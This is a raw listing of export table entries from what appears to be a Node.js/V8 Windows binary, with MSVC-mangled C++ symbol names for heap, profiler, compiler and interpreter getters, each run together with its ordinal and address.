                                                                                                                                                                                                                                    ?GetHeapHandle@CppHeap@v8@@QEAAAEAVHeapHandle@cppgc@@XZ75100x1405185e0
                                                                                                                                                                                                                                    ?GetHeapHandle@Heap@cppgc@@QEAAAEAVHeapHandle@2@XZ75110x1405185e0
                                                                                                                                                                                                                                    ?GetHeapIfMarking@WriteBarrier@internal@v8@@CA?AV?$Optional@PEAVHeap@internal@v8@@@base@3@VHeapObject@23@@Z75120x1405316f0
                                                                                                                                                                                                                                    ?GetHeapObjectStatisticsAtLastGC@Isolate@v8@@QEAA_NPEAVHeapObjectStatistics@2@_K@Z75130x140c85c00
                                                                                                                                                                                                                                    ?GetHeapProfiler@Isolate@v8@@QEAAPEAVHeapProfiler@2@XZ75140x14054b240
                                                                                                                                                                                                                                    ?GetHeapSnapshot@HeapProfiler@v8@@QEAAPEBVHeapSnapshot@2@H@Z75150x140c85cb0
                                                                                                                                                                                                                                    ?GetHeapSpaceStatistics@Isolate@v8@@QEAA_NPEAVHeapSpaceStatistics@2@_K@Z75160x140c85cc0
                                                                                                                                                                                                                                    ?GetHeapStatistics@Isolate@v8@@QEAAXPEAVHeapStatistics@2@@Z75170x140c85d90
                                                                                                                                                                                                                                    ?GetHeapStats@HeapProfiler@v8@@QEAAIPEAVOutputStream@2@PEA_J@Z75180x140c85eb0
                                                                                                                                                                                                                                    ?GetHintFor@BranchHintMap@wasm@internal@v8@@QEBA?AW4WasmBranchHint@234@I@Z75190x1405403d0
                                                                                                                                                                                                                                    ?GetHitBreakPoints@Debug@internal@v8@@QEAA?AV?$MaybeHandle@VFixedArray@internal@v8@@@23@V?$Handle@VDebugInfo@internal@v8@@@23@HPEA_N@Z75200x140bbadb0
                                                                                                                                                                                                                                    ?GetHitBreakpointsAtCurrentStatement@Debug@internal@v8@@AEAA?AV?$MaybeHandle@VFixedArray@internal@v8@@@23@PEAVJavaScriptFrame@23@PEA_N@Z75210x140bbb0d0
                                                                                                                                                                                                                                    ?GetHitCount@CpuProfileNode@v8@@QEBAIXZ75220x140097a20
                                                                                                                                                                                                                                    ?GetHitLineCount@CpuProfileNode@v8@@QEBAIXZ75230x14085cc50
                                                                                                                                                                                                                                    ?GetHitLineCount@ProfileNode@internal@v8@@QEBAIXZ75240x14085cc50
                                                                                                                                                                                                                                    ?GetHomeObjectScope@Scope@internal@v8@@QEAAPEAV123@XZ75250x140c651d0
                                                                                                                                                                                                                                    ?GetHostDefinedOptions@ScriptOrModule@v8@@QEAA?AV?$Local@VPrimitiveArray@v8@@@2@XZ75260x140c85ec0
                                                                                                                                                                                                                                    ?GetHostDefinedOptions@ScriptOrigin@v8@@QEBA?AV?$Local@VData@v8@@@2@XZ75270x140097a10
                                                                                                                                                                                                                                    ?GetI32WasmCallDescriptor@compiler@internal@v8@@YAPEAVCallDescriptor@123@PEAVZone@23@PEBV4123@@Z75280x141083cf0
                                                                                                                                                                                                                                    ?GetId@DiscardedSamplesDelegate@v8@@QEBAIXZ75290x140097580
                                                                                                                                                                                                                                    ?GetId@HeapGraphNode@v8@@QEBAIXZ75300x140464c90
                                                                                                                                                                                                                                    ?GetId@UnboundScript@v8@@QEBAHXZ75310x140c85f60
                                                                                                                                                                                                                                    ?GetIdAt@SourceIdAssigner@compiler@internal@v8@@QEBAH_K@Z75320x141083d20
                                                                                                                                                                                                                                    ?GetIdFor@SourceIdAssigner@compiler@internal@v8@@QEAAHV?$Handle@VSharedFunctionInfo@internal@v8@@@34@@Z75330x1410ea7b0
                                                                                                                                                                                                                                    ?GetIdentifier@Parser@internal@v8@@AEBAPEBVAstRawString@23@XZ75340x14088ed20
                                                                                                                                                                                                                                    ?GetIdentifierString@AsmJsScanner@internal@v8@@QEBAAEBV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ75350x1401ac090
                                                                                                                                                                                                                                    ?GetIdentityHash@JSReceiver@internal@v8@@QEAA?AVObject@23@XZ75360x140960b00
                                                                                                                                                                                                                                    ?GetIdentityHash@Module@v8@@QEBAHXZ75370x140541490
                                                                                                                                                                                                                                    ?GetIdentityHash@Name@v8@@QEAAHXZ75380x140c85f90
                                                                                                                                                                                                                                    ?GetIdentityHash@Object@v8@@QEAAHXZ75390x140c85fc0
                                                                                                                                                                                                                                    ?GetImmediate@InstructionSequence@compiler@internal@v8@@QEBA?AVConstant@234@PEBVImmediateOperand@234@@Z75400x14057f2b0
                                                                                                                                                                                                                                    ?GetImmediateOperand@BytecodeArrayIterator@interpreter@internal@v8@@QEBAHH@Z75410x140a53530
                                                                                                                                                                                                                                    ?GetImplicitRegisterUse@Bytecodes@interpreter@internal@v8@@SA?AW4ImplicitRegisterUse@234@W4Bytecode@234@@Z75420x140540470
                                                                                                                                                                                                                                    ?GetImportAssertions@ModuleRequest@v8@@QEBA?AV?$Local@VFixedArray@v8@@@2@XZ75430x140bcd540
                                                                                                                                                                                                                                    ?GetImportAssertionsFromArgument@Isolate@internal@v8@@AEAA?AV?$MaybeHandle@VFixedArray@internal@v8@@@23@V?$MaybeHandle@VObject@internal@v8@@@23@@Z75440x140b6a750
                                                                                                                                                                                                                                    ?GetImportMeta@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@XZ75450x1410c4e40
                                                                                                                                                                                                                                    ?GetImportMeta@SourceTextModule@internal@v8@@SA?AV?$MaybeHandle@VJSObject@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VSourceTextModule@internal@v8@@@23@@Z75460x1408e81c0
                                                                                                                                                                                                                                    ?GetImportName@DebugInfo@wasm@internal@v8@@QEAA?AU?$pair@VWireBytesRef@wasm@internal@v8@@V1234@@std@@W4ImportExportKindCode@234@I@Z75470x140657cc0
                                                                                                                                                                                                                                    ?GetInLiveness@BytecodeLivenessMap@compiler@internal@v8@@QEAAPEAVBytecodeLivenessState@234@H@Z75480x1410e0200
                                                                                                                                                                                                                                    ?GetInLiveness@BytecodeLivenessMap@compiler@internal@v8@@QEBAPEBVBytecodeLivenessState@234@H@Z75490x1410e0200
                                                                                                                                                                                                                                    ?GetInLivenessFor@BytecodeAnalysis@compiler@internal@v8@@QEBAPEBVBytecodeLivenessState@234@H@Z75500x141247d00
                                                                                                                                                                                                                                    ?GetInObjectProperties@MapRef@compiler@internal@v8@@QEBAHXZ75510x1410187a0
                                                                                                                                                                                                                                    ?GetInObjectPropertiesStartInWords@MapRef@compiler@internal@v8@@QEBAHXZ75520x141018800
                                                                                                                                                                                                                                    ?GetInObjectPropertyOffset@MapRef@compiler@internal@v8@@QEBAHH@Z75530x141018810
                                                                                                                                                                                                                                    ?GetInPlaceInternalizedStringMap@?$FactoryBase@VFactory@internal@v8@@@internal@v8@@QEAA?AV?$MaybeHandle@VMap@internal@v8@@@23@VMap@23@@Z75540x140b34850
                                                                                                                                                                                                                                    ?GetInPlaceInternalizedStringMap@?$FactoryBase@VLocalFactory@internal@v8@@@internal@v8@@QEAA?AV?$MaybeHandle@VMap@internal@v8@@@23@VMap@23@@Z75550x140b34920
                                                                                                                                                                                                                                    ?GetIncomingDescriptor@Linkage@compiler@internal@v8@@QEBAPEAVCallDescriptor@234@XZ75560x140097290
                                                                                                                                                                                                                                    ?GetIncumbentContext@Isolate@internal@v8@@QEAA?AV?$Handle@VContext@internal@v8@@@23@XZ75570x140b6ab00
                                                                                                                                                                                                                                    ?GetIncumbentContext@Isolate@v8@@QEAA?AV?$Local@VContext@v8@@@2@XZ75580x140c86050
                                                                                                                                                                                                                                    ?GetIndex@NormalPageMemoryRegion@internal@cppgc@@AEBA_KPEBE@Z75590x140504680
                                                                                                                                                                                                                                    ?GetIndexNodes@Int64Lowering@compiler@internal@v8@@AEAAXPEAVNode@234@PEAPEAV5234@1@Z75600x1410f06f0
                                                                                                                                                                                                                                    ?GetIndexOperand@BytecodeArrayIterator@interpreter@internal@v8@@QEBAIH@Z75610x140a53570
                                                                                                                                                                                                                                    ?GetIndirectFunctionTable@WasmInstanceObject@internal@v8@@QEAA?AV?$Handle@VWasmIndirectFunctionTable@internal@v8@@@23@PEAVIsolate@23@I@Z75620x140625b40
                                                                                                                                                                                                                                    ?GetInferredName@Function@v8@@QEBA?AV?$Local@VValue@v8@@@2@XZ75630x140c86080
                                                                                                                                                                                                                                    ?GetInitialSpaceIndexForSize@ObjectAllocator@internal@cppgc@@CA?AW4RegularSpaceType@RawHeap@23@_K@Z75640x1405200e0
                                                                                                                                                                                                                                    ?GetInlineability@SharedFunctionInfoRef@compiler@internal@v8@@QEBA?AW4Inlineability@SharedFunctionInfo@34@XZ75650x141018a30
                                                                                                                                                                                                                                    ?GetInliningId@SourcePositionTable@internal@v8@@QEBAHH@Z75660x140866c40
                                                                                                                                                                                                                                    ?GetInputLocation@CallDescriptor@compiler@internal@v8@@QEBA?AVLinkageLocation@234@_K@Z75670x14057f360
                                                                                                                                                                                                                                    ?GetInputPtr@Node@compiler@internal@v8@@AEAAPEAPEAV1234@H@Z75680x14057f390
                                                                                                                                                                                                                                    ?GetInputPtrConst@Node@compiler@internal@v8@@AEBAPEBQEAV1234@H@Z75690x14057f390
                                                                                                                                                                                                                                    ?GetInputRegister@BytecodeRegisterOptimizer@interpreter@internal@v8@@QEAA?AVRegister@234@V5234@@Z75700x140a38090
                                                                                                                                                                                                                                    ?GetInputRegisterList@BytecodeRegisterOptimizer@interpreter@internal@v8@@QEAA?AVRegisterList@234@V5234@@Z75710x140a38120
                                                                                                                                                                                                                                    ?GetInputRegisterListOperand@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAIVRegisterList@234@@Z75720x140a5e370
                                                                                                                                                                                                                                    ?GetInputRegisterOperand@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAIVRegister@234@@Z75730x140a5e3b0
                                                                                                                                                                                                                                    ?GetInputType@CallDescriptor@compiler@internal@v8@@QEBA?AVMachineType@34@_K@Z75740x14057f3c0
                                                                                                                                                                                                                                    ?GetInspectorParentHandle@node@@YA?AV?$unique_ptr@UInspectorParentHandle@node@@U?$default_delete@UInspectorParentHandle@node@@@std@@@std@@PEAVEnvironment@1@UThreadId@1@PEBD@Z75750x14029e1f0
                                                                                                                                                                                                                                    ?GetInstructionBlock@InstructionSequence@compiler@internal@v8@@QEBAPEAVInstructionBlock@234@H@Z75760x141032260
                                                                                                                                                                                                                                    ?GetInstructionFlags@InstructionScheduler@compiler@internal@v8@@AEBAHPEBVInstruction@234@@Z75770x1410dd030
                                                                                                                                                                                                                                    ?GetInterceptor@LookupIterator@internal@v8@@QEBA?AV?$Handle@VInterceptorInfo@internal@v8@@@23@XZ75780x140540540
                                                                                                                                                                                                                                    ?GetInterceptorForFailedAccessCheck@LookupIterator@internal@v8@@QEBA?AV?$Handle@VInterceptorInfo@internal@v8@@@23@XZ75790x1409339e0
                                                                                                                                                                                                                                    ?GetInternalField@Object@v8@@QEAA?AV?$Local@VValue@v8@@@2@H@Z75800x140097780
                                                                                                                                                                                                                                    ?GetInternalProperties@Runtime@internal@v8@@SA?AV?$MaybeHandle@VJSArray@internal@v8@@@23@PEAVIsolate@23@V?$Handle@VObject@internal@v8@@@23@@Z75810x14081d400
                                                                                                                                                                                                                                    ?GetIntrinsicIdOperand@BytecodeArrayIterator@interpreter@internal@v8@@QEBA?AW4FunctionId@Runtime@34@H@Z75820x140a535c0
                                                                                                                                                                                                                                    ?GetIsConcatSpreadable@Symbol@v8@@SA?AV?$Local@VSymbol@v8@@@2@PEAVIsolate@2@@Z75830x140c861f0
                                                                                                                                                                                                                                    ?GetIsolate@Context@v8@@QEAAPEAVIsolate@2@XZ75840x1409d7a10
                                                                                                                                                                                                                                    ?GetIsolate@FeedbackNexus@internal@v8@@QEBAPEAVIsolate@23@XZ75850x1405406e0
                                                                                                                                                                                                                                    ?GetIsolate@HandleScope@v8@@QEBAPEAVIsolate@2@XZ75860x140097290
                                                                                                                                                                                                                                    ?GetIsolate@Message@v8@@QEBAPEAVIsolate@2@XZ75870x1409d7a10
                                                                                                                                                                                                                                    ?GetIsolate@Object@v8@@QEAAPEAVIsolate@2@XZ75880x1409d7a10
                                                                                                                                                                                                                                    ?GetIsolate@Script@debug@v8@@QEBAPEAVIsolate@3@XZ75890x1409d7a10
                                                                                                                                                                                                                                    ?GetIsolate@SnapshotCreator@v8@@QEAAPEAVIsolate@2@XZ75900x1407a3140
                                                                                                                                                                                                                                    ?GetIterator@BytecodeArrayBuilder@interpreter@internal@v8@@QEAAAEAV1234@VRegister@234@HH@Z75910x140a5e3e0
                                                                                                                                                                                                                                    ?GetIterator@JSOperatorBuilder@compiler@internal@v8@@QEAAPEBVOperator@234@AEBUFeedbackSource@234@0@Z75920x1410c4ed0
                                                                                                                                                                                                                                    ?GetIterator@Symbol@v8@@SA?AV?$Local@VSymbol@v8@@@2@PEAVIsolate@2@@Z75930x140c86200
                                                                                                                                                                                                                                    ?GetJSCallArgCountParamIndex@Linkage@compiler@internal@v8@@SAHH@Z75940x14057f400
                                                                                                                                                                                                                                    ?GetJSCallContextParamIndex@Linkage@compiler@internal@v8@@SAHH@Z75950x14057f410
                                                                                                                                                                                                                                    ?GetJSCallDescriptor@Linkage@compiler@internal@v8@@SAPEAVCallDescriptor@234@PEAVZone@34@_NHV?$Flags@W4Flag@CallDescriptor@compiler@internal@v8@@H@base@4@@Z75960x14102bba0
                                                                                                                                                                                                                                    ?GetJSCallNewTargetParamIndex@Linkage@compiler@internal@v8@@SAHH@Z75970x140341520
                                                                                                                                                                                                                                    ?GetJSContextParameter@CodeAssembler@compiler@internal@v8@@QEAA?AV?$TNode@VContext@internal@v8@@@34@XZ75980x1410ab8c0
                                                                                                                                                                                                                                    ?GetJSCreateMap@NodeProperties@compiler@internal@v8@@SA?AV?$Optional@VMapRef@compiler@internal@v8@@@base@4@PEAVJSHeapBroker@234@PEAVNode@234@@Z75990x141034740
                                                                                                                                                                                                                                    ?GetJSEntryStubs@Isolate@v8@@QEAA?AUJSEntryStubs@2@XZ76000x140c86210
                                                                                                                                                                                                                                    ?GetJobFor@LazyCompileDispatcher@internal@v8@@AEBAPEAUJob@123@V?$Handle@VSharedFunctionInfo@internal@v8@@@23@AEBV?$LockGuard@VMutex@base@v8@@$0A@@base@3@@Z76010x140bd9db0
                                                                                                                                                                                                                                    ?GetJumpTableOffset@NativeModule@wasm@internal@v8@@QEBAII@Z76020x140662340
                                                                                                                                                                                                                                    ?GetJumpTableTargetOffsets@BytecodeArrayIterator@interpreter@internal@v8@@QEBA?AVJumpTableTargetOffsets@234@XZ76030x140a53620
                                                                                                                                                                                                                                    ?GetJumpTargetOffset@BytecodeArrayIterator@interpreter@internal@v8@@QEBAHXZ76040x140a53750
                                                                                                                                                                                                                                    ?GetJumpWithoutToBoolean@Bytecodes@interpreter@internal@v8@@SA?AW4Bytecode@234@W45234@@Z76050x140a363a0
                                                                                                                                                                                                                                    ?GetKey@CallDescriptors@internal@v8@@SA?AW4Key@123@PEBVCallInterfaceDescriptorData@23@@Z76060x14057f420
                                                                                                                                                                                                                                    ?GetKey@Descriptor@internal@v8@@QEBA?AV?$Handle@VName@internal@v8@@@23@XZ76070x140099210
                                                                                                                                                                                                                                    ?GetKey@MapUpdater@internal@v8@@AEBA?AVName@23@VInternalIndex@23@@Z76080x14092f9a0
                                                                                                                                                                                                                                    ?GetKey@TransitionsAccessor@internal@v8@@QEAA?AVName@23@H@Z76090x140540720
                                                                                                                                                                                                                                    ?GetKeyType@FeedbackNexus@internal@v8@@QEBA?AW4IcCheckType@23@XZ76100x1409ab0c0
                                                                                                                                                                                                                                    ?GetKeyedAccessLoadMode@FeedbackNexus@internal@v8@@QEBA?AW4KeyedAccessLoadMode@23@XZ76110x1409ab130
                                                                                                                                                                                                                                    ?GetKeyedAccessStoreMode@FeedbackNexus@internal@v8@@QEBA?AW4KeyedAccessStoreMode@23@XZ76120x1409ab2a0
                                                                                                                                                                                                                                    ?GetKeyedStoreICSlotKind@FeedbackVectorSpec@internal@v8@@QEAA?AW4FeedbackSlotKind@23@W4LanguageMode@23@@Z76130x1405407b0
                                                                                                                                                                                                                                    ?GetKind@FeedbackMetadata@internal@v8@@QEBA?AW4FeedbackSlotKind@23@VFeedbackSlot@23@@Z76140x1409ab5b0
                                                                                                                                                                                                                                    ?GetKind@FeedbackVector@internal@v8@@QEBA?AW4FeedbackSlotKind@23@VFeedbackSlot@23@@Z76150x1409ab5f0
                                                                                                                                                                                                                                    ?GetKind@FeedbackVector@internal@v8@@QEBA?AW4FeedbackSlotKind@23@VFeedbackSlot@23@UAcquireLoadTag@3@@Z76160x1409ab630
                                                                                                                                                                                                                                    ?GetKind@FeedbackVectorSpec@internal@v8@@QEBA?AW4FeedbackSlotKind@23@VFeedbackSlot@23@@Z76170x1405407c0
                                                                                                                                                                                                                                    ?GetLabel@CodeGenerator@compiler@internal@v8@@QEAAPEAVLabel@34@VRpoNumber@234@@Z76180x1405f09f0
                                                                                                                                                                                                                                    ?GetLanguageMode@FeedbackNexus@internal@v8@@QEBA?AW4LanguageMode@23@XZ76190x1405407f0
                                                                                                                                                                                                                                    ?GetLastError@OS@base@v8@@SAHXZ76200x140ff4090
                                                                                                                                                                                                                                    ?GetLastFunctionLiteralId@?$ParserBase@VParser@internal@v8@@@internal@v8@@QEBAHXZ76210x14088ed30
                                                                                                                                                                                                                                    ?GetLineNumber@CallSiteInfo@internal@v8@@SAHV?$Handle@VCallSiteInfo@internal@v8@@@23@@Z76220x1409fe6b0
                                                                                                                                                                                                                                    ?GetLineNumber@CpuProfileNode@v8@@QEBAHXZ76230x14085cf60
                                                                                                                                                                                                                                    ?GetLineNumber@JSMessageObject@internal@v8@@QEBAHXZ76240x140960c20
                                                                                                                                                                                                                                    ?GetLineNumber@Location@debug@v8@@QEBAHXZ76250x140097a60
                                                                                                                                                                                                                                    ?GetLineNumber@Location@v8@@QEAAHXZ76260x140097a60
                                                                                                                                                                                                                                    ?GetLineNumber@Message@v8@@QEBA?AV?$Maybe@H@2@V?$Local@VContext@v8@@@2@@Z76270x140c86320
                                                                                                                                                                                                                                    ?GetLineNumber@Script@internal@v8@@SAHV?$Handle@VScript@internal@v8@@@23@H@Z76280x14090ec30
                                                                                                                                                                                                                                    ?GetLineNumber@StackFrame@v8@@QEBAHXZ76290x140097af0
                                                                                                                                                                                                                                    ?GetLineNumber@UnboundScript@v8@@QEAAHH@Z76300x140c864a0
                                                                                                                                                                                                                                    ?GetLineTicks@CpuProfileNode@v8@@QEBA_NPEAULineTick@12@I@Z76310x140c865a0
                                                                                                                                                                                                                                    ?GetLineTicks@ProfileNode@internal@v8@@QEBA_NPEAULineTick@CpuProfileNode@3@I@Z76320x140866cc0
                                                                                                                                                                                                                                    ?GetListOfBlocksRequiringSpillOperands@TopLevelLiveRange@compiler@internal@v8@@QEBAPEAVBitVector@34@PEBVTopTierRegisterAllocationData@234@@Z76330x140097e40
                                                                                                                                                                                                                                    ?GetLiveness@BytecodeLivenessMap@compiler@internal@v8@@QEAAAEAUBytecodeLiveness@234@H@Z76340x1410e0210
                                                                                                                                                                                                                                    ?GetLiveness@BytecodeLivenessMap@compiler@internal@v8@@QEBAAEBUBytecodeLiveness@234@H@Z76350x1410e0210
                                                                                                                                                                                                                                    ?GetLoadedScripts@Debug@internal@v8@@QEAA?AV?$Handle@VFixedArray@internal@v8@@@23@XZ76360x140bbb350
                                                                                                                                                                                                                                    ?GetLoadedScripts@debug@v8@@YAXPEAVIsolate@2@AEAV?$PersistentValueVector@VScript@debug@v8@@VDefaultPersistentValueVectorTraits@3@@2@@Z76370x140bcaa50
                                                                                                                                                                                                                                    ?GetLocalName@DebugInfo@wasm@internal@v8@@QEAA?AVWireBytesRef@234@HH@Z76380x140658010
                                                                                                                                                                                                                                    ?GetLocalOffsetFromOS@DateCache@internal@v8@@UEAAH_J_N@Z76390x140bd6440
                                                                                                                                                                                                                                    ?GetLocalValue@DebugInfo@wasm@internal@v8@@QEAA?AVWasmValue@234@H_K00PEAVIsolate@34@@Z76400x1406581d0
                                                                                                                                                                                                                                    ?GetLocation@StackFrame@v8@@QEBA?AVLocation@2@XZ76410x140c865b0
                                                                                                                                                                                                                                    ?GetLoopInfoFor@BytecodeAnalysis@compiler@internal@v8@@QEBAAEBULoopInfo@234@H@Z76420x141247d20
                                                                                                                                                                                                                                    ?GetLoopInfos@BytecodeAnalysis@compiler@internal@v8@@QEBAAEBV?$ZoneMap@HULoopInfo@compiler@internal@v8@@U?$less@H@std@@@34@XZ76430x14111e5b0
                                                                                                                                                                                                                                    ?GetLoopOffsetFor@BytecodeAnalysis@compiler@internal@v8@@QEBAHH@Z76440x141247d60
                                                                                                                                                                                                                                    ?GetMachineSignature@CallDescriptor@compiler@internal@v8@@QEBAPEAV?$Signature@VMachineType@internal@v8@@@34@PEAVZone@34@@Z76450x14102bdb0
                                                                                                                                                                                                                                    ?GetMacroSourcePositionStack@CodeAssembler@compiler@internal@v8@@QEBAAEBV?$vector@U?$pair@PEBDH@std@@V?$allocator@U?$pair@PEBDH@std@@@2@@std@@XZ76460x1410ab910
                                                                                                                                                                                                                                    ?GetMainThreadHandle@LocalHandleScope@internal@v8@@CAPEA_KPEAVLocalHeap@23@_K@Z76470x140b4ac90
                                                                                                                                                                                                                                    ?GetMainThreadIsolateUnsafe@LocalIsolate@internal@v8@@QEBAPEAVIsolate@23@XZ76480x14033c7b0
                                                                                                                                                                                                                                    ?GetMajor@Version@internal@v8@@SAHXZ76490x14061dcc0
                                                                                                                                                                                                                                    ?GetMap@?$HashTable@VCompilationCacheTable@internal@v8@@VCompilationCacheShape@23@@internal@v8@@SA?AV?$Handle@VMap@internal@v8@@@23@VReadOnlyRoots@23@@Z76500x140540830
                                                                                                                                                                                                                                    ?GetMap@?$HashTable@VEphemeronHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@SA?AV?$Handle@VMap@internal@v8@@@23@VReadOnlyRoots@23@@Z76510x140540830
                                                                                                                                                                                                                                    ?GetMap@?$HashTable@VGlobalDictionary@internal@v8@@VGlobalDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VMap@internal@v8@@@23@VReadOnlyRoots@23@@Z76520x140540830
                                                                                                                                                                                                                                    ?GetMap@?$HashTable@VNameDictionary@internal@v8@@VNameDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VMap@internal@v8@@@23@VReadOnlyRoots@23@@Z76530x140540830
                                                                                                                                                                                                                                    ?GetMap@?$HashTable@VNameToIndexHashTable@internal@v8@@VNameToIndexShape@23@@internal@v8@@SA?AV?$Handle@VMap@internal@v8@@@23@VReadOnlyRoots@23@@Z76540x140540830
                                                                                                                                                                                                                                    ?GetMap@?$HashTable@VNumberDictionary@internal@v8@@VNumberDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VMap@internal@v8@@@23@VReadOnlyRoots@23@@Z76550x140540830
                                                                                                                                                                                                                                    ?GetMap@?$HashTable@VObjectHashSet@internal@v8@@VObjectHashSetShape@23@@internal@v8@@SA?AV?$Handle@VMap@internal@v8@@@23@VReadOnlyRoots@23@@Z76560x140540830
                                                                                                                                                                                                                                    ?GetMap@?$HashTable@VObjectHashTable@internal@v8@@VObjectHashTableShape@23@@internal@v8@@SA?AV?$Handle@VMap@internal@v8@@@23@VReadOnlyRoots@23@@Z76570x140540830
                                                                                                                                                                                                                                    ?GetMap@?$HashTable@VRegisteredSymbolTable@internal@v8@@VRegisteredSymbolTableShape@23@@internal@v8@@SA?AV?$Handle@VMap@internal@v8@@@23@VReadOnlyRoots@23@@Z76580x140540830
                                                                                                                                                                                                                                    ?GetMap@?$HashTable@VSimpleNumberDictionary@internal@v8@@VSimpleNumberDictionaryShape@23@@internal@v8@@SA?AV?$Handle@VMap@internal@v8@@@23@VReadOnlyRoots@23@@Z76590x140540830
                                                                                                                                                                                                                                    ?GetMap@?$HashTable@VStringSet@internal@v8@@VStringSetShape@23@@internal@v8@@SA?AV?$Handle@VMap@internal@v8@@@23@VReadOnlyRoots@23@@Z76600x140540830
                                                                                                                                                                                                                                    ?GetMap@EphemeronHashTable@internal@v8@@SA?AV?$Handle@VMap@internal@v8@@@23@VReadOnlyRoots@23@@Z76610x140540840
                                                                                                                                                                                                                                    ?GetMap@GlobalDictionary@internal@v8@@SA?AV?$Handle@VMap@internal@v8@@@23@VReadOnlyRoots@23@@Z76620x140540850
                                                                                                                                                                                                                                    ?GetMap@NameDictionary@internal@v8@@SA?AV?$Handle@VMap@internal@v8@@@23@VReadOnlyRoots@23@@Z76630x140540860
                                                                                                                                                                                                                                    ?GetMap@NameToIndexHashTable@internal@v8@@SA?AV?$Handle@VMap@internal@v8@@@23@VReadOnlyRoots@23@@Z76640x140540870
                                                                                                                                                                                                                                    ?GetMap@OrderedHashMap@internal@v8@@SA?AV?$Handle@VMap@internal@v8@@@23@VReadOnlyRoots@23@@Z76650x140540880
                                                                                                                                                                                                                                    ?GetMap@OrderedHashSet@internal@v8@@SA?AV?$Handle@VMap@internal@v8@@@23@VReadOnlyRoots@23@@Z76660x140540890
                                                                                                                                                                                                                                    ?GetMap@OrderedNameDictionary@internal@v8@@SA?AV?$Handle@VMap@internal@v8@@@23@VReadOnlyRoots@23@@Z76670x1405408a0
                                                                                                                                                                                                                                    ?GetMapId@WebSnapshotSerializer@internal@v8@@AEAAIVMap@23@@Z76680x1407b51d0
                                                                                                                                                                                                                                    ?GetMarkerRefForTesting@HeapBase@internal@cppgc@@QEAAAEAV?$unique_ptr@VMarkerBase@internal@cppgc@@U?$default_delete@VMarkerBase@internal@cppgc@@@std@@@std@@XZ76690x14037da70
                                                                                                                                                                                                                                    ?GetMatch@Symbol@v8@@SA?AV?$Local@VSymbol@v8@@@2@PEAVIsolate@2@@Z76700x140c86720
                                                                                                                                                                                                                                    ?GetMaterializedEquivalent@BytecodeRegisterOptimizer@interpreter@internal@v8@@AEAAPEAVRegisterInfo@1234@PEAV51234@@Z76710x140a38230
                                                                                                                                                                                                                                    ?GetMaterializedEquivalentNotAccumulator@BytecodeRegisterOptimizer@interpreter@internal@v8@@AEAAPEAVRegisterInfo@1234@PEAV51234@@Z76720x140a38260
                                                                                                                                                                                                                                    ?GetMaxAllocatedBytes@StatsScope@ZoneStats@compiler@internal@v8@@QEAA_KXZ76730x1411d3070
                                                                                                                                                                                                                                    ?GetMaxAllocatedBytes@ZoneStats@compiler@internal@v8@@QEBA_KXZ76740x1411d30a0
                                                                                                                                                                                                                                    ?GetMaxChildCount@TopLevelLiveRange@compiler@internal@v8@@QEBAHXZ76750x14109c090
                                                                                                                                                                                                                                    ?GetMaxConcurrency@ConcurrentMarking@internal@v8@@AEAA_K_K@Z76760x140b42950
                                                                                                                                                                                                                                    ?GetMaxMemoryUsage@AccountingAllocator@internal@v8@@QEBA_KXZ76770x140097b70
                                                                                                                                                                                                                                    ?GetMaxSnapshotJSObjectId@HeapSnapshot@v8@@QEBAIXZ76780x140c86730
                                                                                                                                                                                                                                    ?GetMaxStringLength@JSNativeContextSpecialization@compiler@internal@v8@@SA?AV?$Optional@_K@base@4@PEAVJSHeapBroker@234@PEAVNode@234@@Z76790x1411a1dc0
                                                                                                                                                                                                                                    ?GetMaximumFillToAlign@Heap@internal@v8@@SAHW4AllocationAlignment@23@@Z76800x140b06c20
                                                                                                                                                                                                                                    ?GetMetaTableField@SwissNameDictionary@internal@v8@@AEAAHH@Z76810x1405408b0
                                                                                                                                                                                                                                    ?GetMetricRecorder@CppHeap@internal@v8@@QEBAPEAVMetricRecorderAdapter@123@XZ76820x140b3fa30
                                                                                                                                                                                                                                    ?GetMetricRecorder@StatsCollector@internal@cppgc@@QEBAPEAVMetricRecorder@23@XZ76830x1404d9d20
                                                                                                                                                                                                                                    ?GetMicrotaskQueue@Context@v8@@QEAAPEAVMicrotaskQueue@2@XZ76840x140c86740
                                                                                                                                                                                                                                    ?GetMicrotasksPolicy@Isolate@v8@@QEBA?AW4MicrotasksPolicy@2@XZ76850x140c867d0
                                                                                                                                                                                                                                    ?GetMicrotasksScopeDepth@MicrotaskQueue@internal@v8@@UEBAHXZ76860x1401f1c10
                                                                                                                                                                                                                                    ?GetMigrationTarget@TransitionsAccessor@internal@v8@@QEAA?AVMap@23@XZ76870x1408d4330
                                                                                                                                                                                                                                    ?GetMinor@Version@internal@v8@@SAHXZ76880x14061dd50
                                                                                                                                                                                                                                    ?GetMode@RelocIterator@internal@v8@@AEAA?AW4Mode@RelocInfo@23@XZ76890x140bde690
                                                                                                                                                                                                                                    ?GetModuleNamespace@Module@v8@@QEAA?AV?$Local@VValue@v8@@@2@XZ76900x140c867e0
                                                                                                                                                                                                                                    ?GetModuleRequests@Module@v8@@QEBA?AV?$Local@VFixedArray@v8@@@2@XZ76910x140c868a0
                                                                                                                                                                                                                                    ?GetMultiIsolatePlatform@node@@YAPEAVMultiIsolatePlatform@1@PEAVEnvironment@1@@Z76920x14029e230
                                                                                                                                                                                                                                    ?GetMultiIsolatePlatform@node@@YAPEAVMultiIsolatePlatform@1@PEAVIsolateData@1@@Z76930x14029e240
                                                                                                                                                                                                                                    ?GetMutable@GlobalGCInfoTable@internal@cppgc@@SAAEAVGCInfoTable@23@XZ76940x140504670
                                                                                                                                                                                                                                    ?GetName@CpuProfilesCollection@internal@v8@@QEAAPEBDVName@23@@Z76950x14085cc60
                                                                                                                                                                                                                                    ?GetName@FeedbackNexus@internal@v8@@QEBA?AVName@23@XZ76960x1409ab670
                                                                                                                                                                                                                                    ?GetName@Function@v8@@QEBA?AV?$Local@VValue@v8@@@2@XZ76970x140c86a00
                                                                                                                                                                                                                                    ?GetName@HeapGraphEdge@v8@@QEBA?AV?$Local@VValue@v8@@@2@XZ76980x140c86bc0
